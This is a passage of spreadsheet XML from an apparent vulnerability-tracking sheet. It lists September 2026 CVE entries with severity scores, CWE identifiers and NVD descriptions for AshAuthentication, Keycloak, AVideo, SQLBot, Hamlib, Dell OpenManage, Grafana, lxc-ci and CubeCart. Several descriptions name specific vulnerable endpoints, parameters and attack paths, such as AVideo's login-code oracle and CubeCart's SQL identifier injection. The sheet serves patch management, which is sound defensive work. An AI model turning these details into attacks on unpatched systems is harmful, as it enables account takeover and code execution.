AshAuthentication.Plug.Helpers.store_in_session/2 writes the authenticated subject into the existing session with Plug.Conn.put_session/3 and never calls Plug.Conn.configure_session(renew: true), so the identifier the visitor arrived with carries into their authenticated session. Every authentication event reaches this one function: the default success/4 injected by AshAuthentication.Phoenix.Controller.__using__/1, the AuthController emitted by mix ash_authentication_phoenix.install, and remember-me auto-login. AshAuthentication.Phoenix.Plug.store_in_session/2 is a defdelegate to it. Logout does not close the window either, because clear_session/2 ends with Plug.Conn.clear_session/1, which clears session contents but leaves the identifier intact, so a planted identifier survives a logout-then-login cycle.
This issue affects ash_authentication: from 0.2.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86688</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90997</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>mysql, keycloak</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Keycloak. When deployed in stateless mode with MySQL or MariaDB, a mismatch in row-count semantics between the database driver and Keycloak's application logic allows an attacker to bypass replay protection. This vulnerability enables an attacker who intercepts single-use security artifacts, such as JWT client assertions, DPoP proofs, or one-time password (TOTP) codes, to replay them. Successful exploitation grants unauthorized access to the token endpoint or login flow.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90997</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92913</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.4</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2026-09-17</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 uses a cryptographically weak pseudo-random number generator when creating account activation / login pairing codes. getRandomCode() in objects/functions.php derives the code entirely from uniqid() (sprintf('%08x%05x', seconds, microseconds)) with a single non-CSPRNG rand() character used only as padding, reducing the code space to roughly 36 x 10^6 (~2^25) values for a known generation second. Because plugin/API/set.json.php?APIName=login_code can be called without authentication, it also serves as an oracle for the server's exact microtime. An unauthenticated remote attacker who guesses a valid, unexpired code (codes expire after 10 minutes) can redeem it at plugin/API/get.json.php?APIName=login_code to obtain the target account's email address and a User::getUserHash(users_id, '+1 year') value, a credential accepted in place of the account password for one year, resulting in account takeover. No patched version is available.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92913</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25284</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Information Disclosure when a pointer is reused after being deallocated.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25284</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53554</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, the POST /api/v1/datasource/parseExcel endpoint in backend/apps/datasource/api/datasource.py uses attacker-controlled multipart filename data when selecting where uploaded content is stored, writes the content before spreadsheet parsing and validation finish, and can transform a double-extension filename into a Python source file. An attacker able to submit a crafted multipart upload can use these behaviors to place attacker-controlled content in /opt/sqlbot/app/alembic/versions/ even when a spreadsheet parsing failure after the file write causes the endpoint to return an error. The planted file remains on disk, and subsequent SQLBot startup or migration processing causes Alembic to import the module and execute its module-level statements in the SQLBot application runtime. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53554</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54634</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-787, CWE-908</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Hamlib is a ham radio control library for radios, rotators, and amplifiers. Prior to 4.7.2, the unauthenticated rigctld send_raw command on TCP port 4532 reaches rigctl_send_raw() in tests/rigctl_parse.c, which writes a NUL byte at buf[buf_len + 1] outside its 200-byte stack buffer, and rig_send_raw() in src/rig.c, which copies reply_len - 1 bytes instead of the actual nbytes received. A remote client can send the CR terminator with a short payload to trigger both flaws in one command under the default no-password configuration. The out-of-bounds write can crash the daemon or corrupt adjacent stack memory, while the oversized copy can return up to 198 bytes of uninitialized stack data to the client. This issue is fixed in version 4.7.2.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54634</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66269</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66269</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76154</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting vulnerability in the Geomap panel's MapLibre base layer allows a user with the Editor role to execute arbitrary JavaScript in another user's session by hosting a malicious style configuration, enabling escalation to Org Admin.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76154</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80356</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80356</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81440</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81440</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52727</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>lxc-ci contains continuous integration and image-build scripts for LXC. Prior to the 2026-05-28 Arch Linux image publication, images built from images/archlinux.yaml retain the same pacman local-signing private key in /etc/pacman.d/gnupg and redistribute it to every container or virtual machine created from that image. An attacker who controls an HTTP package mirror or can intercept mirror traffic can use the shared pacman signing private key to sign modified packages that affected clients accept as trusted. Installing those packages permits arbitrary code execution as root on the client system. This issue is fixed in Arch Linux images published on or after 2026-05-28.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52727</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54646</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/maintenance.index.inc.php places administrator-controlled tablename values into ALTER TABLE, CHECK TABLE, and ANALYZE TABLE statements without validating the identifiers or escaping embedded backticks. An authenticated administrator can terminate the quoted identifier with a closing backtick and introduce attacker-controlled structural SQL, potentially compromising database confidentiality, integrity, and availability within the application's database privileges. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54646</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54647</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/settings.index.inc.php directly concatenates the administrator-controlled download_expire POST parameter into a raw UPDATE statement for CubeCart_downloads without numeric validation. An authenticated administrator can supply a comma-delimited value that changes the SET clause because HTML sanitization does not neutralize SQL syntax, allowing manipulation of database columns and potentially other data within the application's database privileges. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54647</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81445</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Privilege Management vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81445</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81477</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Heap-based Buffer Overflow vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81477</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81480</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Stack-based Buffer Overflow vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81480</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81632</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
